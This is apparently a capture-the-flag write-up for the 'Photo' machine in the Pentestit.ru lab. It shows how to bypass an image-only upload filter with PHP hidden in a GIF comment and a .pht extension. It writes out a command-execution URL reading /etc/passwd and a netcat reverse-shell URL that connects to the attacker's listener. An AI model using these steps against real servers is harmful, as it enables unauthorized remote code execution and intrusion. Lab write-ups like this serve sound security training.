Pentestit.ru V.9 (Part 10) – Token Photo

Categories Tutorials

So, another day, another tutorial. 😀
This time we are going to focus our efforts on the “Photo” machine.
As usual, we start with an nmap scan from our “ssh server” shell (the foothold we already have inside the lab network), and we see two open ports: SSH and HTTP.

$ nmap 192.168.0.6 -sV

Starting Nmap 6.00 ( http://nmap.org ) at 2016-08-03 16:17 MSK
Nmap scan report for 192.168.0.6
Host is up (0.0013s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.0p1 Debian 4+deb7u4 (protocol 2.0)
80/tcp open  http    nginx 1.10.0

Service Info: OS: Linux; CPE: cpe:/o:linux:kernel

We start with the most obvious thing: trying the username/password combinations gathered earlier against SSH. That did not work.
So we need to dig into the HTTP page instead.
Opening it in the browser, we are greeted by the following page: [screenshot: vmware_2016-08-03_14-21-49]
Searching for “url title PTT” (because of the “PTT” in the title of the page),
we found the page https://packagist.org/packages/crowd/ptt

It seems this is a CMS created by crowd. We analyze the CMS and look for information about it, but nothing useful comes up, so we start testing the upload feature. We try different file types (.txt, .doc, .py, .sh, .html) until we find out that only image files are accepted.

If this page only accepts images, maybe we can still upload a PHP reverse shell: intercept the upload with Tamper Data and rewrite the request so the server thinks the file is an image (an image/gif Content-Type on a file that is really PHP). Let's try that: [screenshot: vmware_2016-08-03_14-28-39]
The result was: [screenshot: vmware_2016-08-03_14-30-08]
So the file was uploaded, but the server then probably ran an image check on it (a getimagesize()-style validation of the file contents, not just the Content-Type header), noticed it was not an image after all, and deleted it. It seems we really need a valid image file…

We turn to our old friend Google for ways to embed PHP code in an image, and it turns out we can put the code in the “comment” metadata of the image and still have a valid picture: PHP does not care where in the file the <?php … ?> tag sits, it echoes everything around it verbatim and executes only what is between the tags, so the image bytes and the code coexist. So let's try that: [screenshot: gimp-2.8_2016-08-03_14-36-01]
We saved that image and uploaded it to our “photo server”. (The tool used to add the comment was GIMP 2.)
The image uploaded successfully: [screenshot: vmware_2016-08-03_14-38-16]
So now let's try invoking it:

http://192.168.0.6/upload/welcome4.gif?cmd=cat%20/etc/passwd

This only shows our image.
So the upload worked, but the PHP code inside it is not being executed. This is where the secret was: the web server only hands files with certain extensions to the PHP interpreter, and here the image had to be uploaded with a .pht extension (found by sneaking a peek at a write-up; .pht is a historical PHP extension that some PHP handler configurations match alongside .phtml, and this server's setup evidently did). With this in mind, we changed the .gif extension to .pht and uploaded it again.
The upload was successful (again): [screenshot: vmware_2016-08-03_14-48-02]
When we tested it, we got something… 😀 [screenshot: vmware_2016-08-03_14-48-33]
Voilà! It worked, so now we can run commands on the photo server.

We did some enumeration and found that nc is available on the box. So we just need to set up a listener on our side (172.16.0.2, port 25432) and invoke the image with the following parameters (the browser percent-encodes the spaces for us):

http://192.168.0.6/upload/welcome4.pht?cmd=nc%20-nv%20172.16.0.2%2025432%20-e%20/bin/bash

And there it was… our shell \o/ [screenshot: vmware_2016-08-03_14-57-01]
Now we just need to go to our token directory and read its contents:

$ ls
Xiz9soo4qua
welcome4.pht
$ cd Xiz9soo4qua
$ ls
photo.txt
$ cat photo.txt
e*****h***t

2 Comments

  • Vira
    October 24, 2016

    Hi Buh.
    Thanks a lot for all your help.
    I get this token because of your instructions and patience. XD
    Thank you 4 share bro

    Regards

    • admin
      October 25, 2016

Thanks for your comment 🙂
Glad I could help you out 😉
